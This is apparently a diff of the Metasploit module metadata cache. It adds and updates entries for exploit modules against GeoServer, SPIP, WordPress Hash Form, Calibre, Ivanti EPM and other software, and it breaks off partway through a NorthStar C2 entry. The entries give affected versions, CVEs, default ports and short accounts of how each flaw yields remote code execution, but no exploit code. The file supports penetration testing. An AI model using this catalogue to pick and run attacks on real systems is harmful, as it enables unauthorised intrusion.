+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/cacti_pollers_sqli_rce": {
    "name": "Cacti RCE via SQLi in pollers.php",
    "fullname": "exploit/multi/http/cacti_pollers_sqli_rce",
@@ -98298,7 +99958,7 @@
      "Linux Command",
      "Windows Command"
    ],
-    "mod_time": "2024-02-02 11:45:51 +0000",
+    "mod_time": "2024-05-23 10:54:20 +0000",
    "path": "/modules/exploits/multi/http/cacti_pollers_sqli_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/cacti_pollers_sqli_rce",
@@ -100002,6 +101662,72 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/geoserver_unauth_rce_cve_2024_36401": {
+    "name": "Geoserver unauthenticated Remote Code Execution",
+    "fullname": "exploit/multi/http/geoserver_unauth_rce_cve_2024_36401",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-07-01",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "jheysel-r7",
+      "Steve Ikeoka"
+    ],
+    "description": "GeoServer is an open-source software server written in Java that provides\n          the ability to view, edit, and share geospatial data.\n          It is designed to be a flexible, efficient solution for distributing geospatial data\n          from a variety of sources such as Geographic Information System (GIS) databases,\n          web-based data, and personal datasets.\n          In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,\n          multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users\n          through specially crafted input against a default GeoServer installation due to unsafely\n          evaluating property names as XPath expressions.\n          An attacker can abuse this by sending a POST request with a malicious xpath expression\n          to execute arbitrary commands as root on the system.",
+    "references": [
+      "CVE-2024-36401",
+      "URL-https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv",
+      "URL-https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401",
+      "URL-https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, aarch64, armle",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper",
+      "Windows Command"
+    ],
+    "mod_time": "2024-07-16 11:20:35 +0000",
+    "path": "/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/geoserver_unauth_rce_cve_2024_36401",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/gestioip_exec": {
    "name": "GestioIP Remote Command Execution",
    "fullname": "exploit/multi/http/gestioip_exec",
@@ -100624,7 +102350,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2023-02-08 15:20:32 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/multi/http/gitlab_file_read_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/gitlab_file_read_rce",
@@ -100688,7 +102414,7 @@
    "targets": [
      "Unix Command"
    ],
-    "mod_time": "2023-06-06 17:43:22 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb",
    "is_install_path": true,
    "ref_name": "multi/http/gitlab_github_import_rce_cve_2022_2992",
@@ -102610,7 +104336,7 @@
    "targets": [
      "Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2"
    ],
-    "mod_time": "2020-08-14 13:11:38 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
    "path": "/modules/exploits/multi/http/liferay_java_unmarshalling.rb",
    "is_install_path": true,
    "ref_name": "multi/http/liferay_java_unmarshalling",
@@ -103255,7 +104981,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2024-03-04 20:33:27 +0000",
+    "mod_time": "2024-02-13 16:15:48 +0000",
    "path": "/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb",
    "is_install_path": true,
    "ref_name": "multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966",
@@ -103695,7 +105421,7 @@
    "targets": [
      "Micro Focus Operations Bridge Manager <= 2020.05 (and many other MF products)"
    ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
    "path": "/modules/exploits/multi/http/microfocus_obm_auth_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/microfocus_obm_auth_rce",
@@ -105215,56 +106941,6 @@
    "session_types": false,
    "needs_cleanup": null
  },
-  "exploit_multi/http/openmediavault_cmd_exec": {
-    "name": "OpenMediaVault Cron Remote Command Execution",
-    "fullname": "exploit/multi/http/openmediavault_cmd_exec",
-    "aliases": [
-
-    ],
-    "rank": 600,
-    "disclosure_date": "2013-10-30",
-    "type": "exploit",
-    "author": [
-      "Brandon Perry <bperry.volatile@gmail.com>"
-    ],
-    "description": "OpenMediaVault allows an authenticated user to create cron jobs as arbitrary users on the system.\n      An attacker can abuse this to run arbitrary commands as any user available on the system (including root).",
-    "references": [
-      "CVE-2013-3632",
-      "URL-https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats"
-    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
-    "rport": 80,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2022-01-23 15:28:32 +0000",
-    "path": "/modules/exploits/multi/http/openmediavault_cmd_exec.rb",
-    "is_install_path": true,
-    "ref_name": "multi/http/openmediavault_cmd_exec",
-    "check": false,
-    "post_auth": true,
-    "default_credential": false,
-    "notes": {
-    },
-    "session_types": false,
-    "needs_cleanup": null
-  },
  "exploit_multi/http/openmrs_deserialization": {
    "name": "OpenMRS Java Deserialization RCE",
    "fullname": "exploit/multi/http/openmrs_deserialization",
@@ -106844,7 +108520,7 @@
    "targets": [
      "PHPStudy 2016-2018"
    ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/multi/http/phpstudy_backdoor_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/phpstudy_backdoor_rce",
@@ -108480,7 +110156,7 @@
      "x86/x64 Windows CmdStager",
      "Windows Exec"
    ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
    "path": "/modules/exploits/multi/http/solr_velocity_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/solr_velocity_rce",
@@ -108679,6 +110355,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/spip_porte_plume_previsu_rce": {
+    "name": "SPIP Unauthenticated RCE via porte_plume Plugin",
+    "fullname": "exploit/multi/http/spip_porte_plume_previsu_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-08-16",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein",
+      "Laluka",
+      "Julien Voisin"
+    ],
+    "description": "This module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.\n          The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input,\n          allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a\n          payload manipulating the templating data processed by the `echappe_retour()` function, invoking\n          `traitements_previsu_php_modeles_eval()`, which contains an `eval()` call.",
+    "references": [
+      "URL-https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html",
+      "URL-https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Unix/Linux Command Shell",
+      "Windows Command Shell"
+    ],
+    "mod_time": "2024-08-20 19:41:05 +0000",
+    "path": "/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/spip_porte_plume_previsu_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/splunk_mappy_exec": {
    "name": "Splunk Search Remote Code Execution",
    "fullname": "exploit/multi/http/splunk_mappy_exec",
@@ -108776,7 +110516,7 @@
      "Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux",
      "Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows"
    ],
-    "mod_time": "2024-02-22 17:13:44 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb",
    "is_install_path": true,
    "ref_name": "multi/http/splunk_privilege_escalation_cve_2023_32707",
@@ -110563,7 +112303,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2023-10-11 16:56:20 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
    "path": "/modules/exploits/multi/http/torchserver_cve_2023_43654.rb",
    "is_install_path": true,
    "ref_name": "multi/http/torchserver_cve_2023_43654",
@@ -112441,6 +114181,69 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/wp_hash_form_rce": {
+    "name": "WordPress Hash Form Plugin RCE",
+    "fullname": "exploit/multi/http/wp_hash_form_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-23",
+    "type": "exploit",
+    "author": [
+      "Francesco Carlucci",
+      "Valentin Lobstein"
+    ],
+    "description": "The Hash Form – Drag & Drop Form Builder plugin for WordPress suffers from a critical vulnerability\n          due to missing file type validation in the file_upload_action function. This vulnerability exists\n          in all versions up to and including 1.1.0. Unauthenticated attackers can exploit this flaw to upload arbitrary\n          files, including PHP scripts, to the server, potentially allowing for remote code execution on the affected\n          WordPress site. This module targets multiple platforms by adapting payload delivery and execution based on the\n          server environment.",
+    "references": [
+      "CVE-2024-5084",
+      "URL-https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form/hash-form-drag-drop-form-builder-110-unauthenticated-arbitrary-file-upload-to-remote-code-execution"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Unix/Linux Command Shell",
+      "Windows Command Shell"
+    ],
+    "mod_time": "2024-06-05 10:14:48 +0000",
+    "path": "/modules/exploits/multi/http/wp_hash_form_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wp_hash_form_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/wp_ninja_forms_unauthenticated_file_upload": {
    "name": "WordPress Ninja Forms Unauthenticated File Upload",
    "fullname": "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload",
@@ -114172,6 +115975,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/misc/calibre_exec": {
+    "name": "Calibre Python Code Injection (CVE-2024-6782)",
+    "fullname": "exploit/multi/misc/calibre_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-07-31",
+    "type": "exploit",
+    "author": [
+      "Amos Ng",
+      "Michael Heinzl"
+    ],
+    "description": "This module exploits a Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.15.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic, and does not require any authentication. The injected payload will get executed in the same context under which Calibre is being executed.",
+    "references": [
+      "URL-https://starlabs.sg/advisories/24/24-6782",
+      "CVE-2024-6782"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows_Fetch",
+      "Linux Command"
+    ],
+    "mod_time": "2024-08-03 05:13:33 +0000",
+    "path": "/modules/exploits/multi/misc/calibre_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/calibre_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/misc/claymore_dual_miner_remote_manager_rce": {
    "name": "Nanopool Claymore Dual Miner APIs RCE",
    "fullname": "exploit/multi/misc/claymore_dual_miner_remote_manager_rce",
@@ -115644,6 +117508,60 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/misc/vscode_ipynb_remote_dev_exec": {
+    "name": "VSCode ipynb Remote Development RCE",
+    "fullname": "exploit/multi/misc/vscode_ipynb_remote_dev_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-11-22",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Zemnmez"
+    ],
+    "description": "VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.\n          On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embed\n          HTML and javascript, which can then open new terminal windows within VSCode.\n          Each of these new windows can then execute arbitrary code at startup.\n\n          During testing, the first open of the Jupyter notebook resulted in pop-ups\n          displaying errors of unable to find the payload exe file. The second attempt\n          at opening the Jupyter notebook would result in successful exeuction.\n\n          Successfully tested against VSCode 1.70.2 on Windows 10.",
+    "references": [
+      "URL-https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m",
+      "CVE-2022-41034",
+      "URL-https://github.com/andyhsu024/CVE-2022-41034"
+    ],
+    "platform": "",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows",
+      "Linux File-Dropper"
+    ],
+    "mod_time": "2024-05-13 10:11:56 +0000",
+    "path": "/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/vscode_ipynb_remote_dev_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "first-attempt-fail"
+      ],
+      "SideEffects": [
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/misc/w3tw0rk_exec": {
    "name": "w3tw0rk / Pitbul IRC Bot  Remote Code Execution",
    "fullname": "exploit/multi/misc/w3tw0rk_exec",
@@ -122552,7 +124470,7 @@
    "description": "This module exploits a remote command execution vulnerability in Zivif\n          webcams.  This is known to impact versions prior to and including v2.3.4.2103.\n          Exploit was reported in CVE-2017-17105.",
    "references": [
      "URL-https://seclists.org/fulldisclosure/2017/Dec/42",
-      "CVE-2017-171069"
+      "CVE-2017-17105"
    ],
    "platform": "Unix",
    "arch": "",
@@ -122575,7 +124493,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2023-02-10 18:04:31 +0000",
+    "mod_time": "2024-06-11 17:35:39 +0000",
    "path": "/modules/exploits/unix/http/zivif_ipcheck_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/http/zivif_ipcheck_exec",
@@ -123839,7 +125757,7 @@
      "Linux",
      "CMD"
    ],
-    "mod_time": "2022-10-27 13:33:18 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/unix/webapp/aerohive_netconfig_lfi_log_poison_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/aerohive_netconfig_lfi_log_poison_rce",
@@ -127084,6 +129002,70 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_unix/webapp/openmediavault_auth_cron_rce": {
+    "name": "OpenMediaVault rpc.php Authenticated Cron Remote Code Execution",
+    "fullname": "exploit/unix/webapp/openmediavault_auth_cron_rce",
+    "aliases": [
+      "exploit/multi/http/openmediavault_cmd_exec"
+    ],
+    "rank": 600,
+    "disclosure_date": "2013-10-30",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Brandon Perry <bperry.volatile@gmail.com>"
+    ],
+    "description": "OpenMediaVault allows an authenticated user to create cron jobs as root on the system.\n          An attacker can abuse this by sending a POST request via rpc.php to schedule and execute\n          a cron entry that runs arbitrary commands as root on the system.\n          All OpenMediaVault versions including the latest release 7.4.2-2 are vulnerable.",
+    "references": [
+      "CVE-2013-3632",
+      "PACKETSTORM-178526",
+      "URL-https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats",
+      "URL-https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2024-07-29 14:02:29 +0000",
+    "path": "/modules/exploits/unix/webapp/openmediavault_auth_cron_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/openmediavault_auth_cron_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/openmediavault_rpc_rce": {
    "name": "OpenMediaVault rpc.php Authenticated PHP Code Injection",
    "fullname": "exploit/unix/webapp/openmediavault_rpc_rce",
@@ -129961,7 +131943,7 @@
    "disclosure_date": "2015-10-10",
    "type": "exploit",
    "author": [
-      "Unknown",
+      "PizzaHatHacker",
      "Roberto Soares Espreto <robertoespreto@gmail.com>"
    ],
    "description": "This module exploits an arbitrary file upload in the WordPress Ajax Load More\n        version 2.8.1.1. It allows to upload arbitrary php files and get remote code\n        execution. This module has been tested successfully on WordPress Ajax Load More\n        2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.",
@@ -129989,7 +131971,7 @@
    "targets": [
      "Ajax Load More 2.8.1.1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-06-01 16:00:45 +0000",
    "path": "/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_ajax_load_more_file_upload",
@@ -131530,7 +133512,7 @@
    "targets": [
      "wpDiscuz < 7.0.5"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_wpdiscuz_unauthenticated_file_upload",
@@ -153423,7 +155405,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2023-09-07 22:01:49 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
    "path": "/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/winrar_cve_2023_38831",
@@ -153658,7 +155640,7 @@
    "targets": [
      "Microsoft Office Word"
    ],
-    "mod_time": "2022-08-25 15:56:39 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
    "path": "/modules/exploits/windows/fileformat/word_msdtjs_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/word_msdtjs_rce",
@@ -153719,7 +155701,7 @@
    "targets": [
      "Hosted"
    ],
-    "mod_time": "2021-12-08 17:22:44 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
    "path": "/modules/exploits/windows/fileformat/word_mshtml_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/word_mshtml_rce",
@@ -159067,7 +161049,7 @@
      "URL-https://github.com/pwntester/ysoserial.net"
    ],
    "platform": "Windows",
-    "arch": "",
+    "arch": "x86, x64",
    "rport": 80,
    "autofilter_ports": [
      80,
@@ -159091,7 +161073,7 @@
      "v9.2.0 - v9.2.1",
      "v9.2.2 - v9.3.0-RC"
    ],
-    "mod_time": "2022-12-04 17:50:24 +0000",
+    "mod_time": "2024-06-18 09:23:41 +0000",
    "path": "/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/dnn_cookie_deserialization_rce",
@@ -160459,6 +162441,7 @@
    "description": "An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).\n          FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized\n          platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which\n          can be sent directly into database queries.\n\n          FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013\n          and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.\n          In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable\n          SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code\n          execution in the context of NT AUTHORITY\\SYSTEM\n\n          Affected versions of FortiClient EMS include:\n          7.2.0 through 7.2.2\n          7.0.1 through 7.0.10\n\n          Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.\n\n          It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient\n          EMS for the necessary vulnerable services to be available.",
    "references": [
      "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/",
+      "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-revisiting-fortinet-forticlient-ems-to-exploit-7-2-x/",
      "URL-https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py",
      "CVE-2023-48788"
    ],
@@ -160483,7 +162466,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2024-04-12 10:00:07 +0000",
+    "mod_time": "2024-07-25 09:14:27 +0000",
    "path": "/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb",
    "is_install_path": true,
    "ref_name": "windows/http/forticlient_ems_fctid_sqli",
@@ -162510,7 +164493,7 @@
      "Windows Command",
      "Windows Powershell"
    ],
-    "mod_time": "2023-02-08 15:20:32 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb",
    "is_install_path": true,
    "ref_name": "windows/http/hpe_sim_76_amf_deserialization",
@@ -163153,6 +165136,70 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_windows/http/ivanti_epm_recordgoodapp_sqli_rce": {
+    "name": "Ivanti EPM RecordGoodApp SQLi RCE",
+    "fullname": "exploit/windows/http/ivanti_epm_recordgoodapp_sqli_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-05-24",
+    "type": "exploit",
+    "author": [
+      "James Horseman",
+      "Christophe De La Fuente"
+    ],
+    "description": "Ivanti Endpoint Manager (EPM) 2022 SU5 and prior are vulnerable to unauthenticated SQL injection which can be leveraged to achieve unauthenticated remote code execution.",
+    "references": [
+      "URL-https://forums.ivanti.com/s/article/Security-Advisory-May-2024",
+      "URL-https://www.zerodayinitiative.com/advisories/ZDI-24-507",
+      "URL-https://github.com/horizon3ai/CVE-2024-29824",
+      "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/",
+      "CVE-2024-29824"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-06-21 10:13:08 +0000",
+    "path": "/modules/exploits/windows/http/ivanti_epm_recordgoodapp_sqli_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/ivanti_epm_recordgoodapp_sqli_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/jira_collector_traversal": {
    "name": "JIRA Issues Collector Directory Traversal",
    "fullname": "exploit/windows/http/jira_collector_traversal",
@@ -163599,6 +165646,66 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_windows/http/lg_simple_editor_rce_uploadvideo": {
+    "name": "LG Simple Editor Command Injection (CVE-2023-40504)",
+    "fullname": "exploit/windows/http/lg_simple_editor_rce_uploadvideo",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-04",
+    "type": "exploit",
+    "author": [
+      "rgod",
+      "Michael Heinzl"
+    ],
+    "description": "Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.\n          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-1208/",
+      "CVE-2023-40504"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows_Fetch"
+    ],
+    "mod_time": "2024-08-13 20:29:30 +0000",
+    "path": "/modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/lg_simple_editor_rce_uploadvideo",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/mailenable_auth_header": {
    "name": "MailEnable Authorization Header Buffer Overflow",
    "fullname": "exploit/windows/http/mailenable_auth_header",
@@ -163808,7 +165915,7 @@
    "targets": [
      "Windows Command"
    ],
-    "mod_time": "2022-08-05 11:34:46 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb",
    "is_install_path": true,
    "ref_name": "windows/http/manageengine_adaudit_plus_cve_2022_28219",
@@ -164269,7 +166376,7 @@
      "Windows EXE Dropper",
      "Windows Command"
    ],
-    "mod_time": "2024-02-22 23:19:58 +0000",
+    "mod_time": "2024-06-14 12:05:12 +0000",
    "path": "/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb",
    "is_install_path": true,
    "ref_name": "windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966",
@@ -164705,7 +166812,7 @@
    "targets": [
      "Windows Command"
    ],
-    "mod_time": "2023-06-22 14:23:25 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/windows/http/moveit_cve_2023_34362.rb",
    "is_install_path": true,
    "ref_name": "windows/http/moveit_cve_2023_34362",
@@ -164955,6 +167062,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/northstar_c2_xss_to_agent_rce": {
+    "name": "NorthStar C2 XSS to Agent RCE",
+    "fullname": "exploit/windows/http/northstar_c2_xss_to_agent_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
